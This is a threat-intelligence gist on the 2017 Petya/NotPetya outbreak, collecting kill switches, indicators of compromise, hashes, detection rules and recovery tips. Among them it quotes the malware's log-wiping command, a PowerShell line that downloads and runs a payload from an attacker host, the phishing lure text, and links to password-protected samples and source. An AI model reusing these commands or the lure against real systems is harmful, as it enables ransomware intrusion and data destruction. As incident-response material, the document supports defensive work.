ecrist/Petya_ransomware.txt

## Petya_ransomware.txt
#petya #petrWrap

Win32/Diskcoder.Petya.C
Ransomware attack.

Got new info? Email at isox@vulners.com

*********** KILLSWITCH // PARTIAL? GOT PROOF - EMAIL!
Looks like if you block C:\Windows\perfc.dat from writing/executing - stops #Petya. Is used for rundll32 import.
https://twitter.com/HackingDave/status/879779361364357121

Local kill switch - create file "C:\Windows\perfc"
It kills WMI vector. Still need to patch MS17-010 for full protection.

Amit Serper (amit@cybereason.com)
https://twitter.com/0xAmit/status/879764284020064256
Positive Technologies
https://twitter.com/ptsecurity/status/879766638731591680

*********** Group Policy Preferences to deploy the NotPetya vaccine
https://eddwatton.wordpress.com/2017/06/27/use-group-policy-preferences-to-deploy-the-notpetya-vaccine/

*********** Ransom
Infected with #Petya? DON'T PAY RANSOM, You wouldn't get your files back. Email used by criminals has been Suspended.
https://posteo.de/blog/info-zur-ransomware-petrwrappetya-betroffenes-postfach-bereits-seit-mittag-gesperrt

*********** Bitcoin wallet monitoring

https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

*********** Samples:
https://yadi.sk/d/QT0l_AYg3KXCqc
https://yadi.sk/d/S0-ZhPY53KWc84
https://yadi.sk/d/Zpkm88sp3KWc8v
https://yadi.sk/d/WemMDKVy3KXPcy
Archive password: virus
Thanks to the https://twitter.com/OxFemale for the initial malware body.

*********** Source code:
Archive password: virus

-- svchost.exe:
https://yadi.sk/d/TsNv7OGW3KXvmS   // Thanks to the @Sn0wFX_
-- 027cc450ef5f8c5f653329641ec1fed9.exe in pseudocode:
https://transfer.sh/m9JMB/027cc450ef5f8c5f653329641ec1fed9.txt
-- RTF payload data:
https://transfer.sh/mCshn/data.txt

***********  Initial vector:
Ukraine «М.Е. Doc» software
http://blog.antiphish.ru/all/petya-iiv/

Additionally, the initial attack vector:
https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html

Here is the patch that mitigates the attack vector, CVE-2017-0199:
https://support.microsoft.com/en-us/help/3178703/description-of-the-security-update-for-office-2016-april-11-2017

*********** Ransomware includes:
Modified EternalBlue exploit
A vulnerability in a third-party Ukrainian software product
A second SMB network exploit

*********** Origin (NO PROOF):
Petya was known to be RaaS (Ransomware-as-a-Service), selling on Tor hidden services. Looks like WannaCry copycat. Attribution will be hard.
https://twitter.com/x0rz/status/879733138792099842

***********  Vulnerabilities/Vectors/Actions:
MS17-010: https://vulners.com/search?query=ms17-010%20order:published

PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped and is legit PSEXEC bin

Remote WMI, “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”

Log clean, «wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:»

Creates a scheduled task that reboots 1 hour after infection. If task removed before the hour, does not reschedule and can buy time

Petya also attempts to kill Exchange & MySQL if they are running.  If you host either of these services and notice them die, this is including in it's infection process (svchost.exe) // by Mike "Bones" Flowers:

Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im Microsoft.Exchange.*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im MSExchange*
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlserver.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im sqlwriter.exe
Exec: C:\\windows\\system32\\cmd.exe
Params: /c taskkill.exe /f /im mysqld.exe

***********  Test local account behavior [NOT TESTED]:
Don't know if you have also noticed, but it only encrypted the MFT records for my test user account profile folders, the default Windows accounts Administrator, default user etc were all untouched, my test account was local so I don't know what behaviour would be expected for domain account profile folders.

100% on the sample used by me and on a standalone computer, user files were encrypted prior to reboot and the malware was not able to escalate privileges to deploy the MFT encryption payload, no instructions were deposited about recovering these files

http://imgur.com/a/FhaZx

*********** Possible IP addresses:
185.165.29.78
84.200.16.242
111.90.139.247
95.141.115.108

*********** Email:
wowsmith123456@posteo.net
iva76y3pr@outlook.com         // by WhiteWolfCyber
carmellar4hegp@outlook.com    // by WhiteWolfCyber
amanda44i8sq@outlook.com      // by WhiteWolfCyber
gabrielai59bjg@outlook.com
christagcimrl@outlook.com
amparoy982wa@outlook.com
rachael052bx@outlook.com
sybilm0gdwc@outlook.com
christian.malcharzik@gmail.com

*********** Email forms ant attach:
The subject in this case are formed like that (for targed "targed.emailName@targedDomain.com"):
targed.emailName

The body:
Hello targed.emailName,

You will be billed $ 2,273.42 on your Visa card momentarily.
Go through attachment to avoid it.
Password is 6089

With appreciation!
Prince

Attached file name:
Scan_targed.emailName.doc

*********** Malware dropped file [REPORTED AS WRONG]:
http://185.165.29.78/~alex/svchost.exe

*********** Droppers sent via email by WhiteWolfCyber:
9B853B8FE232B8DED38355513CFD4F30
CBB9927813FA027AC12D7388720D4771
22053C34DCD54A5E3C2C9344AB47349A702B8CFDB5796F876AEE1B075A670926
1FE78C7159DBCB3F59FF8D410BD9191868DEA1B01EE3ECCD82BCC34A416895B5
EEF090314FBEC77B20E2470A8318FC288B2DE19A23D069FE049F0D519D901B95

***********  Analysis:
https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
https://www.hybrid-analysis.com/sample/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206?environmentId=100
https://www.hybrid-analysis.com/sample/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6?environmentId=100

https://twitter.com/PolarToffee/status/879709615675641856

*********** Hashes by codexgigas team:

For 185.165.29.78, we have:

a809a63bc5e31670ff117d838522dec433f74bee
bec678164cedea578a7aff4589018fa41551c27f
d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
aba7aa41057c8a6b184ba5776c20f7e8fc97c657
0ff07caedad54c9b65e5873ac2d81b3126754aac
51eafbb626103765d3aedfd098b94d0e77de1196
078de2dc59ce59f503c63bd61f1ef8353dc7cf5f

As droppers

And for 84.200.16.242:

7ca37b86f4acc702f108449c391dd2485b5ca18c
2bc182f04b935c7e358ed9c9e6df09ae6af47168
1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
82920a2ad0138a2a8efc744ae5849c6dde6b435d

*********** Targeted extensions by @GasGeverij
.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.


*********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning
- - - - - - - - - - - - - - - - - - - - - - -  -

File Name            Order-20062017.doc       (RTF із CVE-2017-0199)
MD5 Hash Identifier       415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier     101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier                FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size                6215 bytes
File Type              Rich Text Format data

Connects to the host:

84.200.16.242     80

h11p://84.200.16.242/myguy.xls

File Name            myguy.xls
MD5 Hash Identifier       0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier     736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier                EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size                13893 bytes
File Type              Zip archive data

mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
    10807.exe %APPDATA%\10807.exe" " (PID: 3096)

File Name            BCA9D6.exe
MD5 Hash Identifier       A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier     9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier                17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size                275968 bytes


!!!! Unproofed
Connects to the host:

111.90.139.247  80
COFFEINOFFICE.XYZ       80

Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part.


*********** IOС by Informzachita (infosec.ru)

type,value,comment,to_ids,date
Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","https://otx.alienvault.com/pulse/59525e7a95270e240c055ead/",1,20170627
Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
Payload delivery,filename,"dllhost.dat","",1,20170627
External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
Network activity,url,"http://185.165.29.78/~alex/svchost.exe","",1,20170627
Network activity,url,"http://84.200.16.242/myguy.xls","",1,20170627
Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
Network activity,email-dst,"wowsmith123456@posteo.net","",1,20170627
Network activity,url,"http://french-cooking.com/myguy.exe","",1,20170627
Network activity,ip-dst|port,"111.90.139.247|80","",1,20170627
Network activity,domain,"coffeinoffice.xyz","",1,20170627
Network activity,ip-dst,"95.141.115.108","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"84.200.16.242","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"111.90.139.247","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Network activity,ip-dst,"185.165.29.78","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
External analysis,vulnerability,"CVE-2017-0144","",0,20170627
External analysis,comment,"attack-vector:phishing","",0,20170627

*********** SNORT rules for the detection by Positive Technologies (ptsecurity.com):

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Unimplemented Trans2 Sub-Command code. Possible ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; byte_test: 2, >, 0x0008, 52, relative, little; pcre: "/\xFFSMB2\x00\x00\x00\x00.{52}(?:\x04|\x09|\x0A|\x0B|\x0C|\x0E|\x11)\x00/"; flowbits: set, SMB.Trans2.SubCommand.Unimplemented; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001254; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] ETERNALBLUE (WannaCry, Petya) SMB MS Windows RCE"; flow: to_server, established; content: "|FF|SMB3|00 00 00 00|"; depth: 9; offset: 4; flowbits: isset, SMB.Trans2.SubCommand.Unimplemented.Code0E; threshold: type limit, track by_src, seconds 60, count 1; reference: cve, 2017-0144; classtype: attempted-admin; sid: 10001255; rev: 3;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Trans2 Sub-Command 0x0E. Likely ETERNALBLUE (WannaCry, Petya) tool"; flow: to_server, established; content: "|FF|SMB2|00 00 00 00|"; depth: 9; offset: 4; content: "|0E 00|"; distance: 52; within: 2; flowbits: set, SMB.Trans2.SubCommand.Unimplemented.Code0E; reference: url, msdn.microsoft.com/en-us/library/ee441654.aspx; classtype: attempted-admin; sid: 10001256; rev: 2;)

alert tcp any any -> $HOME_NET 445 (msg: "[PT Open] Petya ransomware perfc.dat component"; flow: to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content: "|70 00 65 00 72 00 66 00 63 00 2e 00 64 00 61 00 74 00|"; distance:0; classtype:suspicious-filename-detect; sid: 10001443; rev: 1;)

alert tcp any any -> $HOME_NET 445 (msg:"[PT Open] SMB2 Create PSEXESVC.EXE"; flow:to_server, established, no_stream; content: "|fe 53 4d 42|"; offset: 4; depth: 4; content: "|05 00|"; offset: 16; depth: 2; byte_jump: 2, 112, little, from_beginning, post_offset 4; content:"|50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 45 00 58 00 45|"; distance:0; classtype:suspicious-filename-detect; sid: 10001444; rev:1;)

*********** Sagan log analysis rules for the detection by Quadrant Information Security (quadrantsec.com) - Note: These are NOT Snort/Suricata rules! See http://sagan.io for more details:

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA256 hash detected - Open source"; meta_content: "%sagan%",64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206,ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd,e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003121; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery SHA1 hash detected - Open source"; meta_content: "%sagan%",34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d,027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745,101cc1cb56c407d5b9149f2c3b8523350d23ba84,a809a63bc5e31670ff117d838522dec433f74bee,d5bf3f100e7dbcc434d7c58ebf64052329a60fc2,aba7aa41057c8a6b184ba5776c20f7e8fc97c657,bec678164cedea578a7aff4589018fa41551c27f,078de2dc59ce59f503c63bd61f1ef8353dc7cf5f,0ff07caedad54c9b65e5873ac2d81b3126754aac,51eafbb626103765d3aedfd098b94d0e77de1196,82920a2ad0138a2a8efc744ae5849c6dde6b435d,1b83c00143a1bb2bf16b46c01f36d53fb66f82b5,7ca37b86f4acc702f108449c391dd2485b5ca18c,2bc182f04b935c7e358ed9c9e6df09ae6af47168,9288fb8e96d419586fc8c595dd95353d48e8a060,736752744122a0b5e
e4b95ddad634dd225dc0f73,9288fb8e96d419586fc8c595dd95353d48e8a060,dd52fcc042a44a2af9e43c15a8e520b54128
cdc8; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003122; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya payload delivery MD5 hash detected - Open source"; meta_content: "%sagan%",71b6a493388e7d0b40c83ce903bc6b04,415fe69bf32634ca98fa07633f4118e1,0487382a4daf8eb9660f1c67e30f8b25,a1d5895f85751dfe67d19cccb51b051a; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003123; rev:1;)

alert any $EXTERNAL_NET any -> $HOME_NET any (msg: "[WINDOWS-MALWARE] Petya detected by filename - Open source"; meta_content: "%sagan%",myguy.xls,myguy.exe,BCA9D6.EXE,Order-20062017.doc,myguy.xls.hta; meta_nocase; classtype: trojan-activity; reference: url,gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759; reference: url,isc.sans.edu/forums/diary/Widescale+Petya+variant+ransomware+attack+noted/22560/; sid:5003124; rev:1;)

*********** Has sysinternal utilities signature
https://twitter.com/ppeepuppy/status/879706271535972353

*********** Uses the The GetExtendedTcpTable function to get a list of available endpoints
https://twitter.com/pjcampbe11/status/879709929073979392

*********** List of extensions targeted
https://twitter.com/MrCarlMcDade/status/879706580127809536

*********** Indicates possible usage of PSEXEC, on windows that means the admin$ and c$ shares.
https://twitter.com/rikvduijn/status/879726410201526272

*********** It is confirmed that the sample 027cc... contains PSEXEC:
https://twitter.com/NVISO_Labs/status/879724733696274432

*********** Friends in Ukraine are telling me this helps to recover from Petya (untested):
https://twitter.com/msuiche/status/879722894997278720
bootrec /RebuildBcd
bootrec /fixMbr
bootrec /fixboot

*********** Fix suggest by @MrAdz350
If you can boot to a Windows ISO prior to Frist reboot you can use bootrec tool to prevent MBR overwriting as per https://neosmart.net/wiki/fix-mbr

*********** Petya— Enhanced WannaCry? What we know so far.
https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb

*********** Found evidences of post kernel exploitation too: IA32_SYSENTER_EIP after decoding kernel shellcode
https://twitter.com/msuiche/status/879713211368525824

***********  #Petya uses long #sleep functions: if infected you have 30-40 mins to turn off your computer to save it from ransom.
https://twitter.com/GroupIB_GIB/status/879736598535032832

***********  #Petya uses LSADump to get Admin password and infect all network. There is no need for #EternalBlue vulnerable PCs.
https://twitter.com/GroupIB_GIB/status/879772068300165120

*********** Explanation from Microsoft
https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/

*********** Information about MBRFilter
http://blog.talosintelligence.com/2016/10/mbrfilter.html
https://www.talosintelligence.com/mbrfilter
https://www.youtube.com/watch?v=nLyOi75Wu3A

*********** Recent news from THN/Threatpost/Blogs:
https://vulners.com/search?query=(Petya%20OR%20notPetya)%20order:published